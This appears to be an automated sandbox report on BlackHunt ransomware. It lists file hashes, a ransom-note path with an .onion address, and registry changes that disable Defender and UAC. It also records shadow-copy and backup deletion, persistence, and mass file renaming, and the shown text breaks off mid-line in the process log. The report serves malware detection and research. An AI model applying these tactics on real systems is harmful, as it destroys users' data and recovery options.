Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
172s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:23
Static task
static1
Behavioral task
behavioral1
Sample
53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe
Resource
win10v2004-20231215-en
General
-
Target
53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe
-
Size
707KB
-
MD5
b980df145054ac9d8426c2dcfe160312
-
SHA1
f1977e2488ddcacfedf9d7228d1ab9bb91b80489
-
SHA256
53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4
-
SHA512
c1c9d7487c5d0d699443a6ff02937f376ca2021ad92932369b75f6b149c462b9154bffda49cb5a362e77b67b953788f29ac7e8ca7fbe628c30cf19bb16539b50
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8Avnh:6uaTmkZJ+naie5OTamgEoKxLWveh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1656 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3268 bcdedit.exe 1716 bcdedit.exe -
Renames multiple (699) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 628 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\K: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\Y: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\I: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\L: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\Z: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\S: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\B: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\N: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\Q: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\W: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\R: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\T: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\U: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\X: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\V: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\O: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\P: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\H: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\J: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened (read-only) \??\M: 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xalan.md 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jfxrt.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\dotnet\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunjce_provider.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\packager.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_CN.properties 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\javafx-mx.jar 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jcup.md 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xalan.md 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#BlackHunt_ReadMe.txt 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\applet\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1312 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 220 vssadmin.exe 1444 vssadmin.exe 1100 vssadmin.exe 1036 vssadmin.exe 3424 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeRestorePrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeBackupPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeTakeOwnershipPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeAuditPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeSecurityPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeIncBasePriorityPrivilege 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe Token: SeBackupPrivilege 2992 vssvc.exe Token: SeRestorePrivilege 2992 vssvc.exe Token: SeAuditPrivilege 2992 vssvc.exe Token: SeBackupPrivilege 1392 wbengine.exe Token: SeRestorePrivilege 1392 wbengine.exe Token: SeSecurityPrivilege 1392 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4532 wrote to memory of 2328 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 91 PID 4532 wrote to memory of 2328 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 91 PID 4532 wrote to memory of 2248 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 94 PID 4532 wrote to memory of 2248 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 94 PID 4532 wrote to memory of 3496 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 96 PID 4532 wrote to memory of 3496 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 96 PID 2328 wrote to memory of 216 2328 cmd.exe 93 PID 2328 wrote to memory of 216 2328 cmd.exe 93 PID 4532 wrote to memory of 1728 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 98 PID 4532 wrote to memory of 1728 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 98 PID 4532 wrote to memory of 968 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 100 PID 4532 wrote to memory of 968 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 100 PID 3496 wrote to memory of 3804 3496 cmd.exe 102 PID 3496 wrote to memory of 3804 3496 cmd.exe 102 PID 2248 wrote to memory of 1788 2248 cmd.exe 103 PID 2248 wrote to memory of 1788 2248 cmd.exe 103 PID 1728 wrote to memory of 2684 1728 cmd.exe 104 PID 1728 wrote to memory of 2684 1728 cmd.exe 104 PID 968 wrote to memory of 1468 968 cmd.exe 105 PID 968 wrote to memory of 1468 968 cmd.exe 105 PID 4532 wrote to memory of 2796 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 107 PID 4532 wrote to memory of 2796 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 107 PID 4532 wrote to memory of 1984 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 108 PID 4532 wrote to memory of 1984 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 108 PID 4532 wrote to memory of 1392 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 213 PID 4532 wrote to memory of 1392 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 213 PID 4532 wrote to memory of 3672 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 114 PID 4532 wrote to memory of 3672 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 114 PID 4532 wrote to memory of 3788 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 112 PID 4532 wrote to memory of 3788 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 112 PID 4532 wrote to memory of 4844 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 116 PID 4532 wrote to memory of 4844 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 116 PID 4532 wrote to memory of 3816 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 122 PID 4532 wrote to memory of 3816 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 122 PID 4532 wrote to memory of 3128 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 117 PID 4532 wrote to memory of 3128 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 117 PID 4532 wrote to memory of 1868 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 121 PID 4532 wrote to memory of 1868 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 121 PID 4532 wrote to memory of 2572 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 132 PID 4532 wrote to memory of 2572 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 132 PID 4532 wrote to memory of 1476 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 128 PID 4532 wrote to memory of 1476 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 128 PID 4532 wrote to memory of 3532 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 125 PID 4532 wrote to memory of 3532 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 125 PID 4532 wrote to memory of 1356 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 127 PID 4532 wrote to memory of 1356 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 127 PID 4532 wrote to memory of 1412 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 130 PID 4532 wrote to memory of 1412 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 130 PID 4532 wrote to memory of 1972 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 129 PID 4532 wrote to memory of 1972 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 129 PID 4532 wrote to memory of 1100 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 206 PID 4532 wrote to memory of 1100 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 206 PID 4532 wrote to memory of 4568 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 139 PID 4532 wrote to memory of 4568 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 139 PID 4532 wrote to memory of 4668 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 140 PID 4532 wrote to memory of 4668 4532 53cc2f7d66b7a12868f31c05ecca1dfa54ca17ecd68d9a230e9eebd90436d8c4.exe 140 PID 4532 wrote to memory of 1864 4532 